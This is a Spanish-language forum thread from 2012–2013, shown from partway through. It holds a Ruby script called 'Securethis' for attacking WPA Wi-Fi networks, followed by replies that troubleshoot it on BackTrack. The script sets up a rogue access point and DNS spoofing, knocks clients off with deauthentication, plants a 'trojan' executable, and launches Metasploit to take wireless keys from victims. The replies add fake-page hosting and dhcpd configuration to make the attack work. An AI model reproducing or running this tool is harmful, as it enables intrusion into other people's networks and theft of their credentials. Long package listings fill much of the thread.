system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "Implementado troyano"
sleep 3
`cp -f /root/flowpa/WirelessKeyView.exe /tmp/WirelessKeyView.exe`
Dir.chdir '/root/metasploit'
`cd /root/metasploit`
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./msfconsole -r /root/flowpa/flowpa.rc &> /dev/null &")
sleep 5
down=""
     while down!="si" && down!="no"
puts "Para el ataque tipo downgrade de la red objectivo; usar mdk3 o airebase? El resultado es el mismo pero mdk3 va intentar desconectar el cliente de la red mientras que airebase va crear una red idéntica a la red objectivo  para impedir que se conecte correctamente al AP legitimo. Una cruz roja debería ser visible dónde ve normalmente el icono de su gestor de redes. Solo puede usar una herramienta a la vez. ¿Cual elige?  mdk3/airbase"
down=gets.chomp

     if down=="mdk3"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")
     elsif down=="airbase"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
else
puts "Elegir una respuesta valida"
    end
  end
end


     if(opt=="6")
puts "1 -Editar los ficheros esenciales al crack"
puts "2 -Editar les ficheros log de apache"
puts "3 -Hacer un Rogue transparente permitiendo que el cliente de la red objetivo pueda navegar en la red"
puts "4 -Hacer un listado de los ficheros y derechos respectivos en dans /var/www"
eleccion=""
     while eleccion!="1" && eleccion!="2" && eleccion!="3"
eleccion=gets.chomp

     if eleccion=="1"
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`

     elsif eleccion=="2"
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`

     elsif eleccion=="3"
     puts "Efectuando escaneo de redes. Una vez elegido el objetivo prensar Ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Entrar nombre la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar numero de canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación del rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
`iptables --append FORWARD --in-interface at0 -j ACCEPT`
`iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1`
     puts "Reglas iptables establecidas, reiniciando dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
puts "La victima puede ahora navegar en la red; ¡no sean mal@s! :)"
sleep 5

     elsif choix=="4"
     puts "Los ficheros presentes son:"
sleep 3
system ("ls -l /var/www")
    end
  end
end
system ("ruby Securethis.rb")
 


-----------------------------------------------------------------------------------------------------------------------------------------------------
NOTA(S)
  , El mode monitor se activa con el opción 1, si no queréis usar el opción 1 lo hacéis a mano en un shell a parte  con el clásico
Código: [Seleccionar]
sudo airmon-ng start <interfaz>
http://ompldr.org/vZXpjZw/Selección_027.png
Securethis V1.0



http://ompldr.org/vZXpjcQ/Selección_029.png
Securethis V1.0
« Última modificación: Agosto 04, 2012, 11:11:47 am por kcdtv »

Desconectado Zoymufeo1978

  • Usuario
  • *
  • Mensajes: 2
Re:Securethis V1.0
« Respuesta #10 en: Agosto 20, 2012, 14:32:24 pm »
El script es estupendo, te ahorras mucho trabajo. Gracias.

PD: Ahora que caigo, fileserve ya como que no... ¿Hay manera de conseguir los archivos para poderlos modificar a nuestro antojo? Muchas gracias de nuevo.

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #11 en: Agosto 20, 2012, 14:39:07 pm »
Bienvenido en el foro  :)
Gracias por advertir de este problema... desgraciadamente no tengo el fichero.
Voy a mandar un mail a koala para advertirlo y a ver si tiene un backup.

Desconectado Zoymufeo1978

  • Usuario
  • *
  • Mensajes: 2
Re:Securethis V1.0
« Respuesta #12 en: Agosto 20, 2012, 23:02:46 pm »
Gracias. Hacía tiempo que me inscribí en el foro pero desafortunadamente, no he contribuido mucho en él. Estaré atento para ver esos ficheros. Un saludo.

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #13 en: Agosto 21, 2012, 13:36:41 pm »
Hola  :)

Estoy haciendo una version graphiqua del script con GTK pero me va a poner un poco tiempo porque no conosco GTK todavia y estoy apprendido.Voy a poner mas opciones usando reaver y airdrop-ng.Si uno quiere ayudar me y que conoce un poco GTK que me envia un mensaje.

Hasta luego  ;)

Desconectado kiabras

  • Usuario
  • *
  • Mensajes: 164
  • favoritos:playboy tv
Re:Securethis V1.0
« Respuesta #14 en: Marzo 05, 2013, 02:16:38 am »
como ejecuto el script en bactrack 5 r3 me sale este error
Código: [Seleccionar]
ruby '/root/Desktop/new file.rb'
/root/Desktop/new file.rb:10: invalid multibyte char (US-ASCII)
/root/Desktop/new file.rb:10: invalid multibyte char (US-ASCII)
/root/Desktop/new file.rb:10: syntax error, unexpected $end, expecting keyword_end
...~~~~~~~~~~~~~~~~ 0 -Instalación de los elementos          ~...
...                               ^
 


edito:solucionado agregando

: # encoding: utf-8


tengo otro problema en una de las la terminales me sale este error
dnsspoof: fopen: No such file or directory
« Última modificación: Marzo 05, 2013, 08:41:57 am por kiabras »

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #15 en: Marzo 05, 2013, 14:25:24 pm »
hola  ;)


Al principio el programo esta para Unbutu, lo puedes usar con bactrack pero hay que saber el camino exacto de dnspoof en la version de backtrack y ver si todos los elementos estant en el systemo (apt-get...)

Me explico ? :)

Desconectado kiabras

  • Usuario
  • *
  • Mensajes: 164
  • favoritos:playboy tv
Re:Securethis V1.0
« Respuesta #16 en: Marzo 06, 2013, 07:24:30 am »
creo que si que habria  que saver la ruta i modificar el script?

la ruta del dnsspoof   es:   /usr/local/sbin

packetes instalados antes de instalar dependecias con el script opcion (0) lista generada con comando sudo dpkg --get-selections


Código: [Seleccionar]
python-fpconst install
python-gconf install
python-gdbm install
python-geoip install
python-glade2 install
python-gmenu install
python-gnome2 install
python-gnomeapplet install
python-gnomecanvas install
python-gnupginterface install
python-gnuplot install
python-gobject install
python-gtk2 install
python-gtksourceview2 install
python-httplib2 install
python-imaging install
python-imaging-tk install
python-impacket install
python-iniparse install
python-ipy install
python-keybinder install
python-launchpadlib install
python-lazr.restfulclient install
python-lazr.uri install
python-ldap install
python-libxml2 install
python-lightblue install
python-lxml install
python-m2crypto install
python-magic install
python-matplotlib install
python-matplotlib-data install
python-memcache install
python-minimal install
python-mysqldb install
python-netaddr install
python-newt install
python-nltk install
python-notify install
python-numpy install
python-oauth install
python-openssl install
python-osmgpsmap install
python-pam install
python-paramiko install
python-pcapy install
python-pefile install
python-pexpect install
python-pkg-resources install
python-problem-report install
python-psyco install
python-psycopg2 install
python-ptrace install
python-pyasn1 install
python-pybonjour install
python-pycryptopp install
python-pycurl install
python-pydot install
python-pyexiv2 install
python-pyicu install
python-pymssql install
python-pyorbit install
python-pyparsing install
python-pypcap install
python-pysnmp-common install
python-pysnmp4 install
python-pysnmp4-apps install
python-pysnmp4-mibs install
python-pyx install
python-qscintilla2 install
python-qt3 install
python-qt4 install
python-qt4-phonon install
python-scapy install
python-scipy install
python-serial install
python-setuptools install
python-simplejson install
python-sip install
python-smartpm install
python-soappy install
python-support install
python-svn install
python-tk install
python-twisted-bin install
python-twisted-core install
python-twisted-web install
python-tz install
python-urwid install
python-usb install
python-utidylib install
python-vte install
python-wadllib install
python-wicd install
python-wxgtk2.8 install
python-wxversion install
python-xdg install
python-xkit install
python-yaml install
python-zope.interface install
python2 install
python2.6 install
python2.6-dev install
python2.6-minimal install
python3 install
python3-minimal install
python3.1 install
python3.1-minimal install
pyxplot install
qt4-qmake install
r8187-driver install
radeontool install
rainbowcrack install
rainbowcrack-mt install
rake install
rar install
rarian-compat install
rdate install
rdesktop install
rdoc1.8 install
rdoc1.9.2 install
readline-common install
readpst install
reaver install
rebind install
rec-studio install
recordmydesktop install
recordmydesktop-bt install
recoverjpeg install
redfang install
reglookup install
reiserfsprogs install
revhosts install
rfidiot install
rfuzz install
ri install
ri1.8 install
ri1.9.2 install
rifiuti install
rifiuti2 install
rinetd install
rkhunter install
rpm-common install
rrdtool install
rsync install
rsyslog install
rtkit install
rtpbreak install
rtpflood install
rtpinject install
rtpinsertsound install
rtpmixsound install
ruby install
ruby-dev install
ruby1.8 install
ruby1.8-dev install
ruby1.9.2 install
ruby1.9.2-dev install
rubygems install
rubygems1.8 install
rubygems1.9.2 install
safecopy install
sakis3g install
samba-common install
samba-common-bin install
samdump install
samdump2 install
sapyto install
sbd install
scalpel install
scapy install
screen install
screen-resolution-extra install
scrollkeeper install
scrounge-ntfs install
sctpscan install
sdparm install
se-toolkit install
securityfocus install
sed install
sendemail install
sensible-utils install
set install
sfuzz install
sgml-base install
sgml-data install
shared-mime-info install
sharutils install
shodan install
sickfuzz install
sidguesser install
siege install
sipcrack install
sipp install
sipsak install
sipscan install
sipvicious install
skipfish install
sleuthkit install
smali install
smap install
smartphone-pentest-framework install
smbclient install
smbexec install
smbfs install
smistrip install
smtp-user-enum install
smtprc install
smtpscan install
sniffjoke install
snmp install
snmp-mibs-downloader install
snmpcheck install
snmpenum install
snort install
snort-common install
snort-common-libraries install
snort-rules-default install
socat install
sox install
spamhole install
spike install
spooftooph install
sqlbrute install
sqldict install
sqlfairy install
sqlite install
sqlite3 install
sqllhf install
sqlmap install
sqlninja install
sqlscan install
sqlsus install
squashfs-tools install
ssidsniff install
ssl-cert install
sslcaudit install
ssldump install
sslh install
sslscan install
sslsniff install
sslstrip install
sslyze install
statsprocessor install
stegdetect install
strace install
stunnel4 install
subterfuge install
subversion install
sucrack install
sudo install
swaks install
swig install
syslinux install
sysv-rc install
sysvinit-utils install
t50 install
tar install
tasksel install
tasksel-data install
tcl8.4 install
tcl8.5 install
tcpd install
tcpdump install
tcpflow install
tcpreplay install
tcpslice install
tcptrace install
tcptraceroute install
tcpxtract install
telnet install
terminator install
termineter install
testdisk install
testssl.sh install
tex-common install
texlive-base install
texlive-binaries install
texlive-common install
texlive-doc-base install
texlive-extra-utils install
texlive-latex-base install
texlive-latex-base-doc install
texlive-luatex install
tftpbruteforce install
thc-ipv6 install
thc-pptp-bruter install
thc-ssl-dos install
thcsslcheck install
theharvester install
time install
tinyproxy install
tk8.4 install
tk8.5 install
tlssled install
tnscmd10g install
tofrodos install
traceroute install
tree install
trixd00r install
truecrack install
truecrypt install
tsconf install
tsocks install
ttf-dejavu install
ttf-dejavu-core install
ttf-dejavu-extra install
ttf-droid install
ttf-dustin install
ttf-freefont install
ttf-liberation install
ttf-lyx install
ttf-mscorefonts-installer install
ttf-symbol-replacement install
ttf-umefont install
ttf-unfonts-core install
twofi install
tzdata install
tzdata-java install
u3-pwn install
u3-tool install
ua-tester install
uberharvest install
ubiquity install
ubiquity-casper install
ubiquity-frontend-debconf install
ubiquity-frontend-gtk install
ubiquity-ubuntu-artwork install
ubuntu-keyring install
ubuntu-serverguide install
ubuntu-system-service install
ucf install
udev install
udisks install
udp.pl install
udptunnel install
ufw install
unetbootin-bt install
unicornscan install
uniscan install
unix-privesc-check install
unrar install
untidy install
unzip install
update-inetd install
update-manager-core install
update-notifier-common install
upower install
upstart install
upx-ucl install
ureadahead install
urlcrazy install
usbmuxd install
usbutils install
user-setup install
util-linux install
uuid install
uuid-runtime install
v86d install
vbetool install
vega install
videojak install
vim install
vim-common install
vim-runtime install
vim-tiny install
vinetto install
vlan install
voiper install
voiphoney install
voiphopper install
voipong install
volafox install
volatility install
vsftpd deinstall
w3af install
w3m install
waffit install
wapiti install
warvox install
watershed install
watobo install
wbar install
wbarconf install
wce install
webscarab install
websecurify install
webshag install
webshells install
webslayer install
websploit install
weevely install
wepcrack install
wfuzz install
wget install
whatweb install
whiptail install
whois install
wicd install
wicd-daemon install
wicd-gtk install
wifihoney install
wifitap install
wifite install
winbind install
windows-binaries install
wine install
wine1.2 install
wine1.2-gecko install
wireless-crda install
wireless-tools install
wireshark install
wol-e install
wordlists install
wpasupplicant install
wstool install
x-ttcidfont-conf install
x11-apps install
x11-common install
x11-session-utils install
x11-utils install
x11-xfs-utils install
x11-xkb-utils install
x11-xserver-utils install
x11proto-core-dev install
x11proto-fixes-dev install
x11proto-input-dev install
x11proto-kb-dev install
x11proto-randr-dev install
x11proto-render-dev install
x11proto-xext-dev install
xauth install
xbase-clients install
xbitmaps install
xdg-utils install
xfonts-base install
xfonts-encodings install
xfonts-utils install
xgps install
xinit install
xkb-data install
xml-core install
xmltoman install
xpdf-common install
xpdf-reader install
xplico install
xplot-xplot.org install
xprobe2 install
xresprobe install
xserver-common install
xserver-xephyr install
xserver-xorg install
xserver-xorg-core install
xserver-xorg-input-all install
xserver-xorg-input-evdev install
xserver-xorg-input-mouse install
xserver-xorg-input-synaptics install
xserver-xorg-input-vmmouse install
xserver-xorg-input-wacom install
xserver-xorg-video-all install
xserver-xorg-video-apm install
xserver-xorg-video-ark install
xserver-xorg-video-ati install
xserver-xorg-video-chips install
xserver-xorg-video-cirrus install
xserver-xorg-video-fbdev install
xserver-xorg-video-geode install
xserver-xorg-video-i128 install
xserver-xorg-video-i740 install
xserver-xorg-video-intel install
xserver-xorg-video-mach64 install
xserver-xorg-video-mga install
xserver-xorg-video-neomagic install
xserver-xorg-video-nouveau install
xserver-xorg-video-nv install
xserver-xorg-video-openchrome install
xserver-xorg-video-r128 install
xserver-xorg-video-radeon install
xserver-xorg-video-rendition install
xserver-xorg-video-s3 install
xserver-xorg-video-s3virge install
xserver-xorg-video-savage install
xserver-xorg-video-siliconmotion install
xserver-xorg-video-sis install
xserver-xorg-video-sisusb install
xserver-xorg-video-tdfx install
xserver-xorg-video-trident install
xserver-xorg-video-tseng install
xserver-xorg-video-v4l install
xserver-xorg-video-vesa install
xserver-xorg-video-vmware install
xserver-xorg-video-voodoo install
xsltproc install
xspy install
xssed install
xsser install
xssfuzz install
xterm install
xtightvncviewer install
xtrace install
xtrans-dev install
xulrunner-1.9.2 install
xutils-dev install
xz-utils install
yelp install
yersinia install
zenity install
zip install
zlib1g install
zlib1g-dev install
zlibc install
root@bt:~#

video ejecucion script opcion 0 bactrack r3

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.



lista packetes despues de la ejecucion del script opcion ( 0 )

Código: [Seleccionar]
python-glade2 install
python-gmenu install
python-gnome2 install
python-gnomeapplet install
python-gnomecanvas install
python-gnupginterface install
python-gnuplot install
python-gobject install
python-gtk2 install
python-gtksourceview2 install
python-httplib2 install
python-imaging install
python-imaging-tk install
python-impacket install
python-iniparse install
python-ipy install
python-keybinder install
python-launchpadlib install
python-lazr.restfulclient install
python-lazr.uri install
python-ldap install
python-libxml2 install
python-lightblue install
python-lxml install
python-m2crypto install
python-magic install
python-matplotlib install
python-matplotlib-data install
python-memcache install
python-minimal install
python-mysqldb install
python-netaddr install
python-newt install
python-nltk install
python-notify install
python-numpy install
python-oauth install
python-openssl install
python-osmgpsmap install
python-pam install
python-paramiko install
python-pcapy install
python-pefile install
python-pexpect install
python-pkg-resources install
python-problem-report install
python-psyco install
python-psycopg2 install
python-ptrace install
python-pyasn1 install
python-pybonjour install
python-pycryptopp install
python-pycurl install
python-pydot install
python-pyexiv2 install
python-pyicu install
python-pymssql install
python-pyorbit install
python-pyparsing install
python-pypcap install
python-pysnmp-common install
python-pysnmp4 install
python-pysnmp4-apps install
python-pysnmp4-mibs install
python-pyx install
python-qscintilla2 install
python-qt3 install
python-qt4 install
python-qt4-phonon install
python-scapy install
python-scipy install
python-serial install
python-setuptools install
python-simplejson install
python-sip install
python-smartpm install
python-soappy install
python-support install
python-svn install
python-tk install
python-twisted-bin install
python-twisted-core install
python-twisted-web install
python-tz install
python-urwid install
python-usb install
python-utidylib install
python-vte install
python-wadllib install
python-wicd install
python-wxgtk2.8 install
python-wxversion install
python-xdg install
python-xkit install
python-yaml install
python-zope.interface install
python2 install
python2.6 install
python2.6-dev install
python2.6-minimal install
python3 install
python3-minimal install
python3.1 install
python3.1-minimal install
pyxplot install
qt4-qmake install
r8187-driver install
radeontool install
rainbowcrack install
rainbowcrack-mt install
rake install
rar install
rarian-compat install
rdate install
rdesktop install
rdoc1.8 install
rdoc1.9.2 install
readline-common install
readpst install
reaver install
rebind install
rec-studio install
recordmydesktop install
recordmydesktop-bt install
recoverjpeg install
redfang install
reglookup install
reiserfsprogs install
revhosts install
rfidiot install
rfuzz install
ri install
ri1.8 install
ri1.9.2 install
rifiuti install
rifiuti2 install
rinetd install
rkhunter install
rpm-common install
rrdtool install
rsync install
rsyslog install
rtkit install
rtpbreak install
rtpflood install
rtpinject install
rtpinsertsound install
rtpmixsound install
ruby install
ruby-dev install
ruby1.8 install
ruby1.8-dev install
ruby1.9.2 install
ruby1.9.2-dev install
rubygems install
rubygems1.8 install
rubygems1.9.2 install
safecopy install
sakis3g install
samba-common install
samba-common-bin install
samdump install
samdump2 install
sapyto install
sbd install
scalpel install
scapy install
screen install
screen-resolution-extra install
scrollkeeper install
scrounge-ntfs install
sctpscan install
sdparm install
se-toolkit install
securityfocus install
sed install
sendemail install
sensible-utils install
set install
sfuzz install
sgml-base install
sgml-data install
shared-mime-info install
sharutils install
shodan install
sickfuzz install
sidguesser install
siege install
sipcrack install
sipp install
sipsak install
sipscan install
sipvicious install
skipfish install
sleuthkit install
smali install
smap install
smartphone-pentest-framework install
smbclient install
smbexec install
smbfs install
smistrip install
smtp-user-enum install
smtprc install
smtpscan install
sniffjoke install
snmp install
snmp-mibs-downloader install
snmpcheck install
snmpenum install
snort install
snort-common install
snort-common-libraries install
snort-rules-default install
socat install
sox install
spamhole install
spike install
spooftooph install
sqlbrute install
sqldict install
sqlfairy install
sqlite install
sqlite3 install
sqllhf install
sqlmap install
sqlninja install
sqlscan install
sqlsus install
squashfs-tools install
ssidsniff install
ssl-cert install
sslcaudit install
ssldump install
sslh install
sslscan install
sslsniff install
sslstrip install
sslyze install
statsprocessor install
stegdetect install
strace install
stunnel4 install
subterfuge install
subversion install
sucrack install
sudo install
swaks install
swig install
syslinux install
sysv-rc install
sysvinit-utils install
t50 install
tar install
tasksel install
tasksel-data install
tcl8.4 install
tcl8.5 install
tcpd install
tcpdump install
tcpflow install
tcpreplay install
tcpslice install
tcptrace install
tcptraceroute install
tcpxtract install
telnet install
terminator install
termineter install
testdisk install
testssl.sh install
tex-common install
texlive-base install
texlive-binaries install
texlive-common install
texlive-doc-base install
texlive-extra-utils install
texlive-latex-base install
texlive-latex-base-doc install
texlive-luatex install
tftpbruteforce install
thc-ipv6 install
thc-pptp-bruter install
thc-ssl-dos install
thcsslcheck install
theharvester install
time install
tinyproxy install
tk8.4 install
tk8.5 install
tlssled install
tnscmd10g install
tofrodos install
traceroute install
tree install
trixd00r install
truecrack install
truecrypt install
tsconf install
tsocks install
ttf-dejavu install
ttf-dejavu-core install
ttf-dejavu-extra install
ttf-droid install
ttf-dustin install
ttf-freefont install
ttf-liberation install
ttf-lyx install
ttf-mscorefonts-installer install
ttf-symbol-replacement install
ttf-umefont install
ttf-unfonts-core install
twofi install
tzdata install
tzdata-java install
u3-pwn install
u3-tool install
ua-tester install
uberharvest install
ubiquity install
ubiquity-casper install
ubiquity-frontend-debconf install
ubiquity-frontend-gtk install
ubiquity-ubuntu-artwork install
ubuntu-keyring install
ubuntu-serverguide install
ubuntu-system-service install
ucf install
udev install
udisks install
udp.pl install
udptunnel install
ufw install
unetbootin-bt install
unicornscan install
uniscan install
unix-privesc-check install
unrar install
untidy install
unzip install
update-inetd install
update-manager-core install
update-notifier-common install
upower install
upstart install
upx-ucl install
ureadahead install
urlcrazy install
usbmuxd install
usbutils install
user-setup install
util-linux install
uuid install
uuid-runtime install
v86d install
vbetool install
vega install
videojak install
vim install
vim-common install
vim-runtime install
vim-tiny install
vinetto install
vlan install
vlc install
vlc-data install
vlc-nox install
vlc-plugin-pulse install
voiper install
voiphoney install
voiphopper install
voipong install
volafox install
volatility install
vsftpd deinstall
w3af install
w3m install
waffit install
wapiti install
warvox install
watershed install
watobo install
wbar install
wbarconf install
wce install
webscarab install
websecurify install
webshag install
webshells install
webslayer install
websploit install
weevely install
wepcrack install
wfuzz install
wget install
whatweb install
whiptail install
whois install
wicd install
wicd-daemon install
wicd-gtk install
wifihoney install
wifitap install
wifite install
winbind install
windows-binaries install
wine install
wine1.2 install
wine1.2-gecko install
wireless-crda install
wireless-tools install
wireshark install
wol-e install
wordlists install
wpasupplicant install
wstool install
x-ttcidfont-conf install
x11-apps install
x11-common install
x11-session-utils install
x11-utils install
x11-xfs-utils install
x11-xkb-utils install
x11-xserver-utils install
x11proto-core-dev install
x11proto-fixes-dev install
x11proto-input-dev install
x11proto-kb-dev install
x11proto-randr-dev install
x11proto-render-dev install
x11proto-xext-dev install
xauth install
xbase-clients install
xbitmaps install
xdg-utils install
xfonts-base install
xfonts-encodings install
xfonts-utils install
xgps install
xinit install
xkb-data install
xml-core install
xmltoman install
xpdf-common install
xpdf-reader install
xplico install
xplot-xplot.org install
xprobe2 install
xresprobe install
xserver-common install
xserver-xephyr install
xserver-xorg install
xserver-xorg-core install
xserver-xorg-input-all install
xserver-xorg-input-evdev install
xserver-xorg-input-mouse install
xserver-xorg-input-synaptics install
xserver-xorg-input-vmmouse install
xserver-xorg-input-wacom install
xserver-xorg-video-all install
xserver-xorg-video-apm install
xserver-xorg-video-ark install
xserver-xorg-video-ati install
xserver-xorg-video-chips install
xserver-xorg-video-cirrus install
xserver-xorg-video-fbdev install
xserver-xorg-video-geode install
xserver-xorg-video-i128 install
xserver-xorg-video-i740 install
xserver-xorg-video-intel install
xserver-xorg-video-mach64 install
xserver-xorg-video-mga install
xserver-xorg-video-neomagic install
xserver-xorg-video-nouveau install
xserver-xorg-video-nv install
xserver-xorg-video-openchrome install
xserver-xorg-video-r128 install
xserver-xorg-video-radeon install
xserver-xorg-video-rendition install
xserver-xorg-video-s3 install
xserver-xorg-video-s3virge install
xserver-xorg-video-savage install
xserver-xorg-video-siliconmotion install
xserver-xorg-video-sis install
xserver-xorg-video-sisusb install
xserver-xorg-video-tdfx install
xserver-xorg-video-trident install
xserver-xorg-video-tseng install
xserver-xorg-video-v4l install
xserver-xorg-video-vesa install
xserver-xorg-video-vmware install
xserver-xorg-video-voodoo install
xsltproc install
xspy install
xssed install
xsser install
xssfuzz install
xterm install
xtightvncviewer install
xtrace install
xtrans-dev install
xulrunner-1.9.2 install
xutils-dev install
xz-utils install
yelp install
yersinia install
zenity install
zip install
zlib1g install
zlib1g-dev install
zlibc install
root@bt:~#





gracias por el script

subiendo video ejecucion script opcion 4
« Última modificación: Marzo 06, 2013, 10:09:31 am por kiabras »

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #17 en: Marzo 06, 2013, 11:15:18 am »
Hola  ;)


Para hacer mas:


1-  si quieres instalar las dépendencias mas rapido, puedes modificar el tiempo de esperar entre 2 actionnes, por eso hay que escribir el tiempo que quieres despuès

Código: [Seleccionar]
sleep XX

Por ejemplo aqui es sleep 90

Código: [Seleccionar]
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90

El tiempo depende de la red que usas y de la puissancia de tu ordinador.


2-  La gente que usa solamente unbutu puede cambiar esta linea:
Código: [Seleccionar]
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
Con esa:
Código: [Seleccionar]
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install apache2 php5 mysql-server libapache2-mod-php5 php5-mysql &> /dev/null &")

3- No soy seguro pero me parece que una de las dependancias de wireshark ha cambiado desde que he puesto el script aqui.Si teneis problemos con wireshark, mira aqui, dicen como areglar lo:

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.



Por la opcion 4 tienes hay que checkear que las falsas paginas de red estan en /var/www con los derectos correcto y no olvidar el mas importante para la rogue AP, el dhcp.conf.
Usando dnsspoof hay que mirar tambien el dns.txt.

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #18 en: Marzo 06, 2013, 11:55:37 am »
Muy buenas koala, que alegría verte por aquí  :)
"Shame on me!" por no haber puesto antes chincheta a este topic  ::)
Securethis!  ;)


Desconectado kiabras

  • Usuario
  • *
  • Mensajes: 164
  • favoritos:playboy tv
Re:Securethis V1.0
« Respuesta #19 en: Marzo 06, 2013, 14:23:54 pm »
el error del apache lo e solucionado como as dicho
Código: [Seleccionar]
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install apache2 php5 mysql-server libapache2-mod-php5 php5-mysql &> /dev/null &")
Wireshark no e tenido problemas

lo que no se cambiar es el directorio  en el script cambio esta linea  dnsspoof -i at0 -f /root/dns.txt     por esta dnsspoof -i at0 -f /etc/hosts en la consola me pone esto No such file or directory.
en cambio abro una consola i pongo  dnsspoof -i wlan0 /etc/hosts funciona que estoi haciendo mal?

solucionado me havia dejado sin modificar la primera linea de dnsspoof . haora me pasa lo mismo con dhcp server
este es el error que me sale haora
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


si intento conectarme desde otro pc me pone enabled ip adres. otra cosa que pasa es que el essid me cambia todo el rato

dhcpd solucionado con esta configuracion tengo que provar de conectar algun pc pero la consola pone ok me queda resolver lo de los essis aleatorios help

Código: [Seleccionar]
#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
# $Id: dhcpd.conf,v 1.1.1.1 2002/05/21 00:07:44 peloy Exp $
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
#option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;

#default-lease-time 600;
#max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.152.187.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.254.239.0 netmask 255.255.255.224 {
#  range 10.254.239.10 10.254.239.20;
#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}

# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.

#subnet 10.254.239.32 netmask 255.255.255.224 {
#  range dynamic-bootp 10.254.239.40 10.254.239.60;
#  option broadcast-address 10.254.239.31;
#  option routers rtr-239-32-1.example.org;
#}

# A slightly different configuration for an internal subnet.
subnet 10.0.0.0 netmask 255.255.255.224 {
range 10.0.0.1 10.0.0.30;
option domain-name-servers ns1.internal.example.org;
option domain-name "internal.example.org";
option routers 10.5.5.1;
option broadcast-address 10.0.0.0;
default-lease-time 600;
max-lease-time 7200;
}

# Hosts which require special configuration options can be listed in
# host statements.   If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.

#host passacaglia {
#  hardware ethernet 0:0:c0:5d:bd:95;
#  filename "vmunix.passacaglia";
#  server-name "toccata.fugue.com";
#}

# Fixed IP addresses can also be specified for hosts.   These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP.   Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
#  hardware ethernet 08:00:07:26:c0:a5;
#  fixed-address fantasia.fugue.com;
#}

# You can declare a class of clients and then do address allocation
# based on that.   The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.

#class "foo" {
#  match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}

#shared-network 224-29 {
#  subnet 10.17.224.0 netmask 255.255.255.0 {
#    option routers rtr-224.example.org;
#  }
#  subnet 10.0.29.0 netmask 255.255.255.0 {
#    option routers rtr-29.example.org;
#  }
#  pool {
#    allow members of "foo";
#    range 10.17.224.10 10.17.224.250;
#  }
#  pool {
#    deny members of "foo";
#    range 10.0.29.10 10.0.29.230;
#  }
#}


el essid se me cambia todo el rato es como si se asociara halas redes que tengo alado i creara un essid aleatorio
« Última modificación: Marzo 07, 2013, 07:14:28 am por kiabras »

Desconectado kayakista

  • Usuario
  • *
  • Mensajes: 71
Re:Securethis V1.0
« Respuesta #20 en: Marzo 06, 2013, 17:05:58 pm »
Hola koala:
Tiene algun tipo de relación con la aplicación de Airssl que genera un ap falso,ettercap,dhcp y supuestamente genera  password de forma automática,exceptuando el uso de comandos

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
